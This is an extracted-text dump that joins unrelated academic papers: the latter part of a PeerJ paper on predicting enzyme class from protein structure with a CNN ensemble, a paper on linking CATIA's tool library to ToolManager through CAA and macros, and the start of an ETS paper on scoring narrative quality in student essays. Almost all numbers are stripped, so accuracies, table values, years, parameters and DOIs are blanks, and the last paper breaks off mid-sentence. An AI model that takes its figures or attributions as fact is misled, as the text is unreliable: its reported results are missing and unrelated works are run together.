zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table cross-validation accuracy (in percentage) in predicting main enzymatic function using the deep cnn ensemble. architecture architecture class samples linear-svm knn linear-svm knn ec , . . . . ec , . . . . ec , . . . . ec , . . . . ec , . . . . ec , . . . . total , . . . . and l∗hd features for xd, respectively. these two feature vectors are further combined into a single vector of length l∗(m+hd) (= ). for both architectures, knn classification was applied for final class prediction using as distance measure between two feature vectors, x and x , the metric −cor(x ,x ), where cor is the sample spearman’s rank correlation. the value k= was selected for all experiments. for comparison, fusion was also performed with linear svm classification (chang & lin, ). the code was developed in matlab environment and the implementation of cnns was based on matconvnet (vedaldi & lenc, ). results the protein structures (n= , ) were collected from the pdb. only enzymes that occur in a single class were processed, whereas enzymes that perform multiple reactions and are hence associated with multiple enzymatic functions were excluded. since protein sequence was not examined during feature extraction, all enzymes were considered without other exclusion criteria, such as small sequence length or homology bias. the dataset was unbalanced in respect to the different classes. the number of samples per class is shown in table . the dataset was split into five folds. four folds were used for training and one for testing. the training samples were used to learn the parameters of the network (such as the weights of the convolution filters), as well as the parameters of the subsequent classifiers used during fusion (svm or knn model). once the network was trained, the class probabilities were obtained for the testing samples, which were introduced into the trained svm or knn classifier for final prediction. the svm model was linear and thus didn’t require any hyper-parameter optimization. due to the lack of hyper-parameters, no extra validation set was necessary. on the side, the author also examined non-linear svm with a gaussian radial basis function kernel, but didn’t observe any significant improvement; thus, the corresponding results are not reported. a classification result was deemed a true positive if the match with the highest probability was in first place in a rank-ordered list. the classification accuracy (percentage of correctly classified samples over all samples) was calculated for each fold and then averaged across the five folds. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table confusion matrices for each fusion scheme and classification technique. classifier prediction by architecture prediction by architecture linear-svm ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . knn ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . ec . . . . . . . . . . . . classification performance common options for the network were used, except of the size of the filters which was adjusted to the dimensionality of the input data. specifically, the convolutional layer used neurons with a receptive field of size for the first two layers and for the third layer. the stride (specifying the sliding of the filter) was always . the number of filters was , and for the three layers, respectively, and the learning rate was . . the batch size was selected according to the information amount (dimensionality) of the input. it was assumed (and verified experimentally) that for more complicated data, a larger number of samples is required for learning. one thousand samples per batch were used for architecture , which takes as input all channels, and samples per batch for architecture , in which an independent cnn is trained for each channel. the dropout rate was %. the number of epochs was adjusted to the rate of convergence for each architecture ( for architecture and for architecture ). the average classification accuracy over the five folds for each enzymatic class is shown in table for both fusion schemes, whereas the analytic distribution of samples in each class is shown in the form of confusion matrices in table . in order to further assess the performance of the deep networks, receiver operating characteristic (roc) curves and area-under-the-curve (auc) values were calculated for each class for the selected scheme (based on knn and architecture ), as shown in fig. ). the calculations were performed based on the final decision scores in a one-versus-rest classification scheme. the decision scores for the knn classifier reflected the ratio of the within-class neighbors over total number of neighbors. the roc curve represents the true positive rate against the false positive rate and was produced by averaging over the five folds of the cross-validation experiments. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure roc curves for each enzymatic class based on knn and architecture . (a) ec , (b) ec , (c) ec , (d) ec , (e) ec , (f) ec . effect of sequence redundancy and sample size analysis of protein datasets is often performed after removal of redundancy, such that the remaining entries do not overreach a pre-arranged threshold of sequence identity. in the previously presented results, sequence/threshold metrics were not applied to remove sequence-redundancy. although structure similarity is affected by sequence similarity, the aim was not to lose structural entries (necessary for efficient learning) over a sequence based threshold cutoff. also, only x-ray crystallography data were used; such data represent a ‘snapshot’ of a given protein’s d structure. in order not to miss the multiple poses that the same protein may adopt in different crystallography experiments, the whole dataset was explored. subsequently, the performance of the method was also investigated on a less redundant dataset and the classification accuracy was compared in respect to the original (redundant) dataset, but randomly subsampled to include equal number of proteins. this experiment allows to assess the effect of redundancy under the same conditions (number of samples). since inference in deep networks requires the estimation of a very large number of parameters, a large amount of training data is required and therefore very strict filtering strategies could not be applied. a dataset, the pdbaanr (http://dunbrack.fccc.edu/guoli/pisces_download.php), pre-compiled by pisces (wang & dunbrack, ), was used that includes only non-redundant sequences across all pdb files (n= proteins, i.e., half in size of the original dataset). this dataset has one representative for each unique sequence in the pdb; representative chains are selected based on the highest resolution structure available and then the best r-values. non-x-ray structures are considered after x-ray structures. as a note, the author also explored the zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dunbrack.fccc.edu/guoli/pisces_download.php http://dx.doi.org/ . /peerj-cs. leaf algorithm (bull, muldoon & doig, ) which is especially designed to maximize the number of retained proteins and has shown improvement over pisces. however, the computational cost was too high (possibly due to the large number of samples) and the analysis was not completed. the classification performance was assessed on architecture by using % of the samples for training and % of the samples for testing. for the pdbaanr dataset, the accuracy was . % for knn and . % for linear-svm, whereas for the sub-sampled dataset it was . % for knn and . % for linear-svm. the results show that for the selected classifier (knn), the accuracy drops . % when the number of samples is reduced to the half, and it also drops additionally . % if the utilized sequences are less similar. the decrease in performance shows that the method is affected by the number of samples as well as by their similarity level. structural representation and complementarity of features next, some examples of the extracted feature maps are illustrated, in order to provide some insight on the representation of protein’s d structure. the average (over all samples) d histogram of torsion angles for each amino acid is shown in fig. . the horizontal and vertical axes at each plot represent torsion angles (in [− ◦, ◦]). it can be observed that the non-standard (asx, glx, unk) amino acids are very rare, thus their density maps have mostly zeros. the same color scale was used in all plots to make feature maps comparable, as ‘‘seen’’ by the deep network. since the histograms are (deliberately) not normalized for each sample, rare amino acids will have few visible features and due to the ‘max-pooling operator’ will not be selected as significant features. the potential of these feature maps to differentiate between classes is illustrated in fig. for three randomly selected amino acids (ala, gly, tyr). overall the spatial patterns in each class are distinctive and form a multi-dimensional signature for each sample. as a note, before training of the cnn ensemble, data standardization is performed by subtracting the mean density map. the same map is used to standardize the test sample during assessment. examples of features maps representing amino acid distances (xd) are illustrated in figs. and . figure illustrates an image slice across the rd dimension, i.e., one [m×m] channel, and as introduced in the d multichannel cnn, i.e., after mean-centering (over all samples). figure illustrates image slices (of size [m×hd]) across the st dimension averaged within each class. figure has been produced by selecting the same amino acids as in fig. for ease of comparison of the different feature representations. it can be noticed that for all classes most pairwise distances are concentrated in the last bin, corresponding to high distances between amino acids. also, as expected there are differences in quantity of each amino acid, e.g., by focusing on the last bin, it can be seen that ala and gly have higher values than tyr in most classes. moreover, the feature maps indicate clear differences between samples of different classes. the discrimination ability and complementary of the extracted features in respect to classification performance is shown in table . it can be observed that the relative position of amino acids and their arrangement in space (features xd) predict enzymatic function better than the backbone conformation (features xa). also, the fusion of network decisions zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure torsion angles density maps (ramachandran plots) averaged over all samples for each of the standard and three non-standard (asx, glx, unk) amino acids shown in alphabetical order from (a) to (w). the horizontal and vertical axes at each plot correspond to φ and ψ angles and vary from− ◦ (top left) to ◦ (right bottom). the color scale (blue to red) is in the range [ , ]. for an amino acid a, red means that the number of occurrences of the specific value (φ,ψ) in all observations of a (within and across proteins) is at least equal to the number of proteins. on the opposite, blue indi- cates a small number of occurrences, and is observed for rare amino acids or unfavorable conformations. (a) ala, (b) arg, (c) asn, (d) asp, (e) asx, (f) cys, (g) gln, (h) met, (i) glu, (j) glx, (k) gly, (l) his, (m) ile, (n) leu, (o) lys, (p) phe, (q) pro, (r) ser, (s) thr, (t) trp, (u) tyr, (v) unk, (w) val. table cross-validation accuracy (average ± standard deviation over five folds) for each feature set separately and after fusion of cnn outputs based on architecture . feature sets linear-svm knn xa (angles) . ± . . ± . xd (distances) . ± . . ± . ensemble . ± . . ± . based on correlation distance outperforms predictions from either network alone, but the difference is only marginal in respect to the predictions by xd. in all cases the differences in prediction for the performed experiments (during cross validation) was very small (usually standard deviation < . %), indicating that the method is robust to variations in training examples. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure ramachandran plots averaged across samples within each class. rows correspond to amino acids and columns to functional classes. three amino acids (ala from (a) to (f), gly from (g) to (l) and tyr from (m) to (r)) are randomly selected for illustration of class separability. the horizontal and vertical axes at each plot correspond to φ and ψ angles and vary from− ◦ (top left) to ◦ (right bot- tom). the color scale (blue to red) is in the range [ , ] as illustrated in fig. . discussion a deep cnn ensemble was presented that performs enzymatic function classification through fusion in feature level and decision level. the method has been applied for the prediction of the primary ec number and achieved . % accuracy, which is a considerable improvement over the accuracy obtained in our previous work ( . % in amidi et al. ( ) and % in amidi et al. ( )) when only structural information was incorporated. these results were achieved without imposing any pre-selection criteria, such as based on sequence identity, thus the effect of evolutionary relationships, as confounding factor in the prediction of function from d structure, has not been sufficiently studied. since deep learning technology requires a large number of samples to produce generalizable models, a filtered dataset with only non-redundant proteins would be too small for reliable training. this is a limitation of the current approach, which mainly aimed to increase predictive power over previous methods using common features for structural representation and common classifiers such as svm and nearest neighbor, rather than addressing this confounding factor in the prediction of protein structure. many methods have been proposed in the literature using different features and different classifiers. nasibov & kandemir-cavas ( ) obtained %– % accuracy by applying knn-based classification on enzymes based on their amino acid composition. shen & chou ( ) fused results derived from the functional domain and evolution information and obtained . % average accuracy on , enzymes. on the same dataset, zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure histograms of paiwise amino acid distances averaged across samples within each class. the same three amino acids selected in fig. are also shown here (ala from (a) to (f), gly from (g) to (l) and tyr from (m) to (r)). the horizontal axis at each plot represents the histogram bins (distance values in the range [ , ]). the vertical axis at each plot corresponds to the amino acids sorted alphabetically from top to bottom (ala, arg, asn, asp, asx, cys, gln, met, glu, glx, gly, his, ile, leu, lys, phe, pro, ser, thr, trp, tyr, unk, val). thus each row shows the histogram of distances for a spe- cific pair of the amino acids (the one in the title and the one corresponding to the specific row). the color scale is the same for all plots and is shown horizontally at the bottom of the figure. wang et al. ( ) improved the accuracy (which ranged from % to % when predicting the first three ec digits) by using sequence encoding and svm for hierarchy labels. kumar & choudhary ( ) reported overall accuracy of . % in predicting the main class for , enzymes using random forests. volpato, adelfio & pollastri ( ) applied neural networks on the full sequence and achieve % correct classification on , non-redundant proteins. most of the previous methods incorporate sequence-based features. many were assessed on a subset of enzymes acquired after imposition of different pre-selection criteria and levels of sequence similarity. more discussion on machine learning techniques for single-label and multi-label enzyme classification can be found in amidi et al. ( ). assessment of the relationship between function and structure (todd, orengo & thornton, ) revealed % conservation of the fourth ec digit for proteins with up to % sequence identity. similarity, devos & valencia ( ) concluded that enzymatic zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. function is mostly conserved for the first digit of ec code whereas more detailed functional characteristics are poorly conserved. it is generally believed that as sequences diverge, d protein structure becomes a more reliable predictor than sequence, and that structure is far more conserved than sequence in nature (illergård, ardell & elofsson, ). the focus of this study was to explore the predictive ability of d structure and provide a tool that can generalize in cases where sequence information is insufficient. thus, the presented results are not directly comparable to the ones of previous methods due to the use of different features and datasets. if desired, the current approach can easily incorporate also sequence-related features. in such a case however, the use of non-homologous data would be inevitable for rigorous assessment. the reported accuracy is the average of five folds on the testing set. a separate validation set was not used within each fold, because the design of the network architecture (size of convolution kernel, number of layers, etc.) and the final classifier (number of neighbors in knn) were preselected and not optimized within the learning framework. additional validation and optimization of the model would be necessary to improve performance and provide better insight into the capabilities of this method. a possible limitation of the proposed approach is that the extracted features do not capture the topological properties of the d structure. due to the statistical nature of the implemented descriptors, which were calculated by considering the amino acids as elements in euclidean space, connectivity information is not strictly retained. the author and colleagues recently started to investigate in parallel the predictive power of the original d structure, represented as a volumetric image, without the extraction of any statistical features. since the more detailed representation increased the dimensionality considerably, new ways are being explored to optimally incorporate the relationship between the structural units (amino-acids) in order not to impede the learning process. conclusions a method was presented that extracts shape features from the d protein geometry that are introduced into a deep cnn ensemble for enzymatic function prediction. the investigation of protein function based only on structure reveals relationships hidden at the sequence level and provides the foundation to build a better understanding of the molecular basis of biological complexity. overall, the presented approach can provide quick protein function predictions on extensive datasets opening the path for relevant applications, such as pharmacological target identification. future work includes application of the method for prediction of the hierarchical relation of function subcategories and annotation of enzymes up to the last digit of the enzyme classification system. acknowledgements the authors want to thank prof. n paragios from the center for visual computing, centralesupélec, paris, for providing the means to complete this study and dr. d vlachakis from the multidimensional data analysis and knowledge management laboratory, university of patras, for useful discussions on the biological aspects. zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this research was partially supported by european research council grant diocles (erc-stg- ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: european research council grant diocles: erc-stg- . competing interests the authors declare there are no competing interests. author contributions • evangelia i. zacharaki conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data can be found in the pdb public database: www.rcsb.org/pdb/. the code can be downloaded from https://github.com/ezachar/peerj. the code can run either using pdb entries downloaded locally or by accessing the entries from the pdb during run-time. references amidi a, amidi s, vlachakis d, paragios n, zacharaki ei. . a machine learning methodology for enzyme functional classification combining structural and protein sequence descriptors. in: bioinformatics and biomedical engineering. cham: springer, – . amidi s, amidi a, vlachakis d, paragios n, zacharaki ei. . automatic single- and multi-label enzymatic function prediction by machine learning. peerj :e doi . /peerj. . bermejo ga, clore gm, schwieters cd. . smooth statistical torsion angle potential derived from a large conformational database via adaptive kernel density estimation improves the quality of nmr protein structures. protein science ( ): – doi . /pro. . borgwardt km, ong cs, schönauer s, vishwanathan s, smola aj, kriegel h-p. . protein function prediction via graph kernels. bioinformatics (suppl ):i –i doi . /bioinformatics/bti . borro lc, oliveira sr, yamagishi me, mancini al, jardine jg, mazoni i, santos ed, higa rh, kuser pr, neshich g. . predicting enzyme class from protein structure using bayesian classification. genetics and molecular research ( ): – . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com www.rcsb.org/pdb/ https://github.com/ezachar/peerj http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /pro. http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /peerj-cs. bull sc, muldoon mr, doig aj. . maximising the size of non-redundant protein datasets using graph theory. plos one ( ):e doi . /journal.pone. . cai c, han l, ji zl, chen x, chen yz. . svm-prot: web-based support vector machine software for functional classification of a protein from its primary sequence. nucleic acids research ( ): – doi . /nar/gkg . chang c-c, lin c-j. . libsvm: a library for support vector machines. acm transactions on intelligent systems and technology (tist) ( ):article doi . / . . chen c, tian y-x, zou x-y, cai p-x, mo j-y. . using pseudo-amino acid com- position and support vector machine to predict protein structural class. journal of theoretical biology ( ): – doi . /j.jtbi. . . . devos d, valencia a. . practical limits of function prediction. proteins: structure, function, and bioinformatics ( ): – doi . / - ( ) : < ::aid-prot > . .co; -s. dobson pd, doig aj. . predicting enzyme class from protein structure without alignments. journal of molecular biology ( ): – doi . /j.jmb. . . . godzik a. . metagenomics and the protein universe. current opinion in structural biology ( ): – doi . /j.sbi. . . . han l, cai c, ji z, cao z, cui j, chen y. . predicting functional family of novel enzymes irrespective of sequence similarity: a statistical learning approach. nucleic acids research ( ): – doi . /nar/gkh . huang w-l, chen h-m, hwang s-f, ho s-y. . accurate prediction of enzyme subfamily class using an adaptive fuzzy k-nearest neighbor method. biosystems ( ): – doi . /j.biosystems. . . . illergård k, ardell dh, elofsson a. . structure is three to ten times more conserved than sequencea study of structural response in protein cores. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep con- volutional neural networks. in: advances in neural information processing systems. – . kumar c, choudhary a. . a top-down approach to classify enzyme functional classes and sub-classes using random forest. eurasip journal on bioinformatics and systems biology ( ): – doi . / - - - . lee bj, shin ms, oh yj, oh hs, ryu kh. . identification of protein functions using a machine-learning approach based on sequence-derived properties. proteome science : doi . / - - - . li y, shibuya t. . malphite: a convolutional neural network and ensemble learning based protein secondary structure predictor. in: ieee international conference on bioinformatics and biomedicine (bibm). piscataway: ieee, – . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nar/gkg http://dx.doi.org/ . / . http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . / - ( ) : < ::aid-prot > . .co; -s http://dx.doi.org/ . /j.jmb. . . http://dx.doi.org/ . /j.sbi. . . http://dx.doi.org/ . /nar/gkh http://dx.doi.org/ . /j.biosystems. . . http://dx.doi.org/ . /prot. http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. lin z, lanchantin j, qi y. . must-cnn: a multilayer shift-and-stitch deep convolutional architecture for sequence-based protein structure prediction. in: th aaai conference on artificial intelligence. menlo park: aaai. lu l, qian z, cai y-d, li y. . ecs: an automatic enzyme classifier based on func- tional domain composition. computational biology and chemistry ( ): – doi . /j.compbiolchem. . . . nagao c, nagano n, mizuguchi k. . prediction of detailed enzyme functions and identification of specificity determining residues by random forests. plos one ( ): – doi . /journal.pone. . nasibov e, kandemir-cavas c. . efficiency analysis of knn and minimum distance-based classifiers in enzyme family prediction. computational biology and chemistry ( ): – doi . /j.compbiolchem. . . . qiu j-d, huang j-h, shi s-p, liang r-p. . using the concept of chou’s pseudo amino acid composition to predict enzyme family classes: an approach with support vector machine based on discrete wavelet transform. protein and peptide letters ( ): – doi . / . sharma m, garg p. . computational approaches for enzyme functional class prediction: a review. current proteomics ( ): – doi . / . shen h-b, chou k-c. . ezypred: a top–down approach for predicting enzyme func- tional classes and subclasses. biochemical and biophysical research communications ( ): – doi . /j.bbrc. . . . spencer m, eickholt j, cheng j. . a deep learning network approach to ab initio protein secondary structure prediction. ieee/acm transactions on computational biology and bioinformatics (tcbb) ( ): – doi . /tcbb. . . todd ae, orengo ca, thornton jm. . evolution of function in protein superfam- ilies, from a structural perspective. journal of molecular biology ( ): – doi . /jmbi. . . vedaldi a, lenc k. . matconvnet: convolutional neural networks for matlab. in: proceedings of the rd acm international conference on multimedia. new york: acm, – . volpato v, adelfio a, pollastri g. . accurate prediction of protein enzymatic class by n-to- neural networks. bmc bioinformatics ( ): doi . / - - - . wang g, dunbrack rl. . pisces: a protein sequence culling server. bioinformatics ( ): – doi . /bioinformatics/btg . wang y-c, wang x-b, yang z-x, deng n-y. . prediction of enzyme subfamily class via pseudo amino acid composition by incorporating the conjoint triad feature. protein and peptide letters ( ): – doi . / . wang y-c, wang y, yang z-x, deng n-y. . support vector machine prediction of enzyme function with conjoint triad feature and hierarchical context. bmc systems biology ( ): doi . / - - - . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.compbiolchem. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.compbiolchem. . . http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.bbrc. . . http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . / http://dx.doi.org/ . / - - - http://dx.doi.org/ . /peerj-cs. webb ec. . enzyme nomenclature . in: recommendations of the nomenclature committee of the international union of biochemistry and molecular biology on the nomenclature and classification of enzymes. san diego: academic press. yadav sk, tiwari ak. . classification of enzymes using machine learning based approaches: a review. machine learning and applications ( / ): – . zhou x-b, chen c, li z-c, zou x-y. . using chou’s amphiphilic pseudo-amino acid composition and support vector machine for prediction of enzyme subfamily classes. journal of theoretical biology ( ): – doi . /j.jtbi. . . . zacharaki ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . /peerj-cs. your paper's title starts here: please center international journal of advanced network, monitoring, and controls vol. , no. , research of integration technology between catia and toolmanager based on caa li yihui xi'an high voltage apparatus research institute co., ltd. / xi dian group, xi’an, china, liyh@xihari.com abstract: in order to implement the integration of the tool libraries from catia and the tool database, catia software was further developed using caa. caa macro-based integration project about the two libraries is proposed, and the development process is presented. in caa environment provided by catia, though further developed using caa, calling for information, converting information and valuating information of catia and toolmanager were researched. finally, the dynamic calling, association and driving of catia-based tool information were implemented successfully. keywords: catia, toolmanager, tool library, caa introduction: catia is a cad/cae/cam integration software of french dassault systems, which can provides users an integrated digital environment and complexity requirements for users from design to manufacture [ ]. catia provides a . -axis, -axis and multi-axis cnc machining modules. users can compile nc programming using catia, both can call a tool from catia tool library, and can manually enter the parameters to create the tool [ ]. to manage the growing types of knives, many enterprises generally use a professional tool management system, such as toolmanager software which is a highly integrated tool information management system developed by german company. it can effectively manage the tool component, tool components, machine setting bills, tool map and tool supplier information. the tool library mainly offer help for managing tools for the tool room staffs, and facilitate the staffing process three-dimensional technology and cnc programming. catia has powerful cnc machining modules. the basic operation methods of cnc machining include setting processing elements, setting the tool path, setting tool parameters, setting feed / back knife, cutting simulation and generating nc programs. selecting tool is very important in the nc content, for each machining operation needs to specify a processing tool. at present, in the enterprises tool management, the users use the tool and maintain it themselves for each business unit, and users can not exchange of information and share data. for example, during the cnc programming, staff use catia tool management functions and redefine their own tool models and data. the nc programming staff cannot get the latest stock information and use of information, resulting in not purchasing the tool to affect the production cycle. nc programmers do not know the information has resulted in inconsistencies in tool selection, and increased manufacturing costs. with the product mix changes and adjustments, the types and specifications of the tool will continue to change purchased by machinery processing enterprises. if the cnc staff cannot grasp the information of existing enterprise tool, use the tools which do not match the existing tools, will lead to the applicability of nc program reduced, seriously affecting the production schedule. therefore, achieving the integration of catia tool and business management tool is very important. international journal of advanced network, monitoring, and controls vol. , no. , therefore, we studied the catia integration technology of tool library. basing on an enterprise digital manufacturing, catia software is further developed using component application architecture (caa), and dynamic integration of catia and toolmanager tool library is achieved, and it has been successfully applied in the enterprise [ ]. the cnc staff can call tool directly from catia tool library, and can grasp the company's existing tools, and improve the efficiency of cnc programming, and ensure the applicability of cnc code. it provides a good basis for successful implementation of digital manufacturing system. . a further developing method for catia as powerful engineering software, catia has a strong opening performance. users can follow their own needs, using different ways to the development in various degrees. catia secondary development interface communication with external interface is in two ways: in-process applications approach and out-process applications approach. in in-process applications, catia software and scripts to run in the same process address space, such as macro (macro) mode. in the catia environment, the menu record macro, and generate vb script sequence. when the macro starts running, catia is in a non-activated and variables cannot be stored between calling macro. this relatively simple approach can be completed in the catia environment. in out- process applications, catia and external applications run in different process address space. in the case of catia running, external process control catia through the interface, it can create and modify catia environment and geometry data, size, etc. it can also support object linking and embedding. specifically, there are two main ways to catia secondary development: using a macro to the second development and using of catia component application architecture (caa) to the further development [ , ]. . using a macro to the further development users use macro recording a series of operation, automatically generated code, and use vbscript as editing tools, it is a customized interactive way. catia provides catia automation api for vbscript on the secondary development, automation api has the ability to communicate with any ole-compatible platform, automation interface can call "inputbox" and "msgbox" function to get user input information and output [ ]. for nt users, you can apply more complex visual basic to define the input and output interfaces. an icon can be associated with a macro in running, and be into catia display frames. the characteristics of using the macro to the further development of catia are convenient, not only to achieve the desired function, but also to record the macro method and obtain the required procedures. but the disadvantage is that catia cannot perform other operations when the macro is running. the function need be achieved was limited. . . using the component application architecture (caa) on the further development of catia [ , ] caa is an acronym component application architecture, is a platform of dassault systems, international journal of advanced network, monitoring, and controls vol. , no. , which expanding products and customizing and developing for customers. it uses object-oriented programming language; object-oriented programming (object-oriented- programming, oop) has become mainstream in the field of software development and design. caa's development can be seen as a combination and expansion of its component objects. caa uses com technology and ole technology, com as a software architecture has a better module independence, scalability, making it easier to caa programming and become standardized, so that the code more concise. in the support of the caa structure, dassault systems as can be established as the building block, this structure is very suitable for the growth and development of the system. catia uses caa on the further development, its benefits are: reusability, abstraction, encapsulation, etc. however, the complexity of dassault systems and depth involved in the content of caa itself, the second development using caa must have some complexity and difficulty. users familiar with the relevant application system of dassault systems, they must also have basic knowledge of software development, the basic programming skills of c + + (or java), com technology, etc. . integration of catia tool library using a macro . . scheme of integrated tool library in order to achieving integration, when nc program was written and executed tool selection function, catia tool class and the subordinate toolmanager class can be list [ ]. on the other hand, catia to be able to dynamically query the tool data in toolmanager and the selected tool can be returned to the catia environment, finally parameterization drive tool graphics. when nc machining tool is selected using catia, the view of the tool data is the dynamic tool library, it can realize integration of catia and toolmanager. the integration above mainly is to call tool from toolmanager tool library, and then assign the property value of tool to catia nc machining tool module model. the use of macros in the implementation for the further development cannot call the catia function. though further developed using caa, calling for information, converting information and valuating information of catia and toolmanager is researched, finally, the dynamic calling, association and driving of catia-based tool information is implemented successfully [ ]. fig. shows the tool library integrated solution. international journal of advanced network, monitoring, and controls vol. , no. , fig. . tool library integrated solution. . . development process of the integrated tool library to ensure the integrity and accuracy of tool information in library toolmanager tool library, and nc programmers can select the needed tool, before carrying out an integrated development tool, the description field for each type of tool in toolmanager tool library must be sorted combining with enterprise tool existing type for tools, and make it fit the classes and attributes of catia tool. to make catia tool class and toolmanager class correspond, because catia tool that can add new classes, we need to complete further development of catia. the development process is as follows: (i)the corresponding file in catia v r ------ \ program files \ dassault systemes\ b \ intel_a \ resources \ graphic replaced by *. feat file in feat folder. (ii)use wordpad to open mfguserattributes.xml in catia v r ------\ program files \ dassault systemes \ b \ intel_a \ startup \ manufacturing \ samples, and modify the file contents in the second row: results are as follows: <!doctype catspecs system"d:\programfiles\dassaultsystemes\b \intel_a\resources\dtd\mfguserattributes.dtd" >.in this document, we can add tool properties in accordance with the provisions meaning of the field. (iii)start windows/system /cmd.exe:run mfgresourceattr.exe in the test folder, compile mfguserattibutes.xml in \program files\dassault systemes\b \ intel_a\startup\manufacturing\ samples directory, and add tool properties to manufacturing resources extensions. feat and manufacturing literals. feat, and complete the tool additional properties. the additional properties of tool are the basis of building this module. . implementation of integrated international journal of advanced network, monitoring, and controls vol. , no. , combining with actual situation of enterprises, this paper use the method of developing macro to make the second development of the catia, and achieve integration of catia tool and enterprise tool database, the following is system operation interface. the catia tool dynamic calling data and driving module has two main functions: tool data call function: according to the selected class of tool dynamic call tool data tool. tool data-driven features: basing on the selected tool, drive the parameters graphics and toolparameters. the use as follows: first, start the catia v r , into the cnc machining module, select the required cnc machining tool, and then start the tool selection interface, finally implement the integration of two software. conclusion we studied a technology of integration research tool library of catia in shaanxi scientific technology research project, which is named discrete manufacturing enterprise decision support system based on heterogeneous information integration(project no: k - ). tool database creating theory and structure of catia were analyzed. catia secondary development methods were compared and studied. the methods of catia integrated tool database using of macro were proposed. combining with the actual situation of business, the software module is realizing integrated of catia tool library. the successful integration of catia tool database and tool library can supply service as follows: (i)for nc programming, directly select tool from catia tool library, greatly reducing the work of the nc programmer to set parameters of the tool, improving the efficiency of nc programming. (ii)the integrating of catia tool library, it makes tool selected by nc programming closely link to the production site tool, ensuring the applicability of nc program. (iii)improve automation of the enterprise digital manufacturing system and degree of integration. this work was supported by shaanxi provincial scientific and technological research projects under grant nos. df . references [ ]jacques f. delacur, optis, and jean-luc cuinier, presentation of the first plm integrated optical simulation software for the design and engineering of optical systems, proceedings of spie---the international society for optics and photonics, st. etienne, france, vol. , , pp. – . [ ]xu pengcheng, the road of digital manufacturing system, aeronautical manufacturing technology, vol. , , pp. – . international journal of advanced network, monitoring, and controls vol. , no. , [ ]dong yixin, xi ping, secondary development of catia interface, aeronautical manufacturing technology, vol. , , pp. – . [ ]dong yixin, xi ping, the movement simulator of five-axis nc machine based on secondary development of catia, mechanical engineer, vol. , , pp. – . [ ]chen ming, deng shifu, zhu rui, and zhou laishui, cad/cae integration based on catia platform, journal of computer-aided design & computer graphics, vol. , , pp. – . [ ]deng dongmei, zhou laishui, chen gong, an luling, and li wei, design and implementation of catia-based construction tool for component library, journal of south china university of technology, vol. , , pp. – . [ ]wang su, chen nanfei, zhu yuming, and zhu xinxiong, catia-based modeling method for object made of functionally gradient materials, china mechanical engineering, vol. , , pp. – . [ ]yang liuhui, zhang heming, research and application of com-based product information integration in catia environment, computer engineering and applications, vol. , , pp. – . [ ]guo zhe, zang shunlai, wei gongji, chen feng, and guo cheng, secondary development technology of catia v and its application in design of stamping dies, die & mould industry, vol. , , pp. – . [ ]li wei, zhang yongyan, development and application of conversion software of nc program based on catia, aeronautical manufacturing technology, vol. , , pp. – . towards evaluating narrative quality in student writing swapna somasundaran , michael flor , martin chodorow hillary molloy binod gyawali laura mcculla educational testing service, rosedale road, princeton, nj , usa hunter college and the graduate center, cuny, new york, ny , usa educational testing service, new montgomery street, san francisco, ca , usa {ssomasundaran,mflor,hmolloy, bgyawali,lmcculla}@ets.org martin.chodorow@hunter.cuny.edu abstract this work lays the foundation for automated assessments of narrative quality in student writing. we first manually score essays for narrative-relevant traits and sub-traits, and measure inter-annotator agreement. we then explore linguistic features that are indicative of good narrative writing and use them to build an automated scoring system. experiments show that our features are more effective in scoring specific aspects of narrative quality than a state-of-the-art feature set. introduction narrative, which includes personal experiences and stories, real or imagined, is a medium of expression that is used from the very early stages of a child’s life. narratives are also employed in various capac- ities in school instruction and assessment. for ex- ample, the common core state standards, an ed- ucational initiative in the united states that details requirements for student knowledge in grades k- , employs literature/narratives as one of its three language arts genres. with the increased focus on automated evaluation of student writing in educa- tional settings (adams, ), automated methods for evaluating narrative essays at scale are becoming increasingly important. automated scoring of narrative essays is a chal- lenging area, and one that has not been explored ex- tensively in nlp research. previous work on auto- mated essay scoring has focused on informational, argumentative, persuasive and source-based writing constructs (stab and gurevych, ; 